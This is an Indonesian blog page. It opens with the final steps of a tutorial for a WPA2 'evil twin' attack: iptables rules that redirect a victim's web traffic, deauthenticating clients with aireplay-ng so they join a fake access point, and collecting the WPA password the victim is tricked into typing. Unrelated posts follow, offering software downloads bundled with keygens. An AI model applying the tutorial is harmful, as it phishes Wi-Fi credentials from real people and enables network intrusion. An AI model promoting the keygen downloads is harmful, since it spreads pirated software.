Buatlah sebuah rulles pada iptables agar client akan teredirect pada saat mengakses port 80. Alamat yang digunakan sebagai destination ( tujuan ) tentu saja adalah alamat pada interface kita yang terkoneksi dengan internet.
ifconfig eth0
eth0 Link encap:Ethernet HWaddr 44:87:fc:56:86:85
inet addr:192.168.1.13 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::4687:fcff:fe56:8685/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:99424 errors:0 dropped:0 overruns:0 frame:0
TX packets:92864 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:94380248 (94.3 MB) TX bytes:16195158 (16.1 MB)
Interrupt:43
Okey seperti ouput di atas agaknya saya menggunakan ip address 192.168.1.13 yang terkonek dengan gateway berbeda dengan akses point target. Hmm jgn bingung dengan hal ini karena ada kemungkinan pada administrasi jaringan sysadmin memakai beragam subnet ip pada tiap2 AP yang terdapat dalam satu jaringan.
root@eichel:~#iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 192.168.1.13:80
root@eichel:~# iptables -t nat -A POSTROUTING -j MASQUERADE
4. Deauthentifikasi
Agar client terkecoh sesuai dengan tujuan kita , tentunya kita harus mematikan terlebih dahulu akses point dan client yang terkonek didalamnya agar client nantinya malah login ke fakeAP. Kita gunakan aireplay-ng , ane rasa masih pada ingat perintah-perintah dasarnya

Perhatikan pada tab terminal airbase-ng
okey ternyata korban memakan pancingan setelah terdeauthentifikasi dari APTarget dan melakukan authentifikasi ke FakeAP

Client Target side
Mari kita mengintip sebentar proses pada client
Client pada percobaan kali ini memakai sistem operasi windows 7 , anggap saja client masih terkonek dengan AP asli , lihat pada gambar di bawah ada 2 AP yang telah terbentuk

Kemudian keadaan koneksi ke AP pada saat serangan deauth

Dan client pada saat client terkoneksi dengan FakeAP maka routing Iptables ternyata berhasil dengan baik

Anggap client terpancing untuk mengisi password wpa


5. Melihat hasil
Kita tinggal melihat pada database yang telah kita buat tadi , kalau client terkecoh kemudian mengisi password maka password akan terecord pada database

Oke sampai disini dulu ya.. semoga nantinya ada tehnik-tehnik lainnya yang bisa saya jabarkan untuk teman-teman ..
sumber : http://technicdynamic.com/2011/12/hacking-wpa-2-key-evil-twin-no-bruteforce/

Monday, March 19, 2012

Sothink Logo Maker v2.40 Full

Sothink Logo Maker - Ini adalah pembuat logo intuitif dansangat sederhana bagi Anda untuk desain logo dalambe"rapa menit. Anda tidak perlu menjadi seorang desainerlogo profesional untuk membuat logo berkualitas tinggiuntuk sebuah perusahaan, logo bisnis, tanda tangan web, tombol, ikon, dll Hal ini pencipta logo kaya menawarkanbuilt-in template, warna preset & gaya efek, dan dirancang dengan baiklogo gambar yang sepenuhnya akanmemenuhi kebutuhan Anda dan membuat logo Anda yang unik. Kemampuan mengedit besar juga memastikan prosesdesain logo yang halus dan menyenangkan.












Screenshot 


 










Download [20.09 MB] 

Wallpaper Slideshow Pro.v2.9.2 With KeyGen


Wallpaper Slideshow Pro 
adalah aplikasi untuk membuat Slideshow wallpaper untuk menampilkan gambar favorit Anda sebagai wallpaper desktop sobat blogger semua. Aplikasi ini memiliki banyak pilihan untuk menyesuaikan wallpaper yg diciptakan, misalnya untuk setiap gambar Anda dapat memutuskan apakah itu harus diubah ukurannya secara otomatis agar sesuai dengan layar, terpusat, keramik atau membentang di beberapa monitor Anda.
Aplikasi ini juga dapat untuk overlay kalender, teks atau info yang diambil dari pintu keluar / IPTC / XMP kolom pada wallpaper Anda. Sebuah wallpaper baru dapat diatur pada jendela startup, pada interval yg teratur atau secara manual bila Anda menekan hotkey atau klik dua kali pada ikon. Slideshow wallpaper ini mudah digunakan, intuitif dan lengkap dengan penuh bantuan konteks-sensitif.









Screenshoot :
 Key features of "Wallpaper Slideshow Pro":
· User friendly interface with full context-sensitive help
· Displays an unlimited amount of images
· Displays images randomly or sequentially
· Supports JPG, GIF, PNG, TIF, BMP file formats.
· Can change wallpaper automatically after a specified time period (e.g. every 60 minutes)
· Can change wallpaper on every Windows startup
· Automatically resizes images to fit your screen size, it has advanced options to limit resize of small images or to fill the screen without distorting images.
· High quality image resize (bicubic with prefilter)
· Can use a different background color for each wallpaper
· Use a system tray icon for an easy control of the software
· Ability to hide your Windows desktop icons
· Display a preview of selected wallpapers
· Multi monitor support. Each monitor can have a different wallpaper or a single wallpaper can be spanned on all monitors.
· Smooth wallpaper change using a dissolve transition effect
· Can display custom captions with Exif,IPTC,XMP metadata support
· Can overlay on wallpapers a monthly calendar
· Can save/restore desktop icons positions
· Hotkeys to quickly change wallpaper or start the screen saver
· PlugIns support
· Easy install/uninstall












Taskbar Texturizer 1.4

Taskbar Texturizer adalah software yang digunakan untuk mengubah warna dan tekstur taskbar windows anda. Dengan klik kiri, Anda dapat memilih gambar dasar, sedangkan klik kanan akan memungkinkan Anda untuk memilih tekstur FX. Pilihan lain termasuk membuat memudar Start Menu dan taskbar transparan.








Screenshoot:






Make Me 3D v1.10.922 With Keygen

Make Me 3D adalah software yang berfungsi untuk mengubah kualitas video 2D menjadi 3D. Cara kerja software ini mudah, hampir seperti Video Converter. Software ini sudah terbukti dan banyak dipakai untuk mengubah kualitas video. Dibawah ini adalah contoh video yang diconvert menggunakan Make Me 3D.




















Screenshoot :

 



Sample video:






System Requirements:
  • Windows XP/Vista/7
  • Minimal 1 BG RAM, 2GB recommended
  • .net 3 Framework 9 (will be automatic installed, if not available)
  • Pentium compatible CPU. Make Me 3D also support multicore CPUs!



 

Indahnya Berbagi Copyright © 2012 Fast Loading -- Powered by Blogger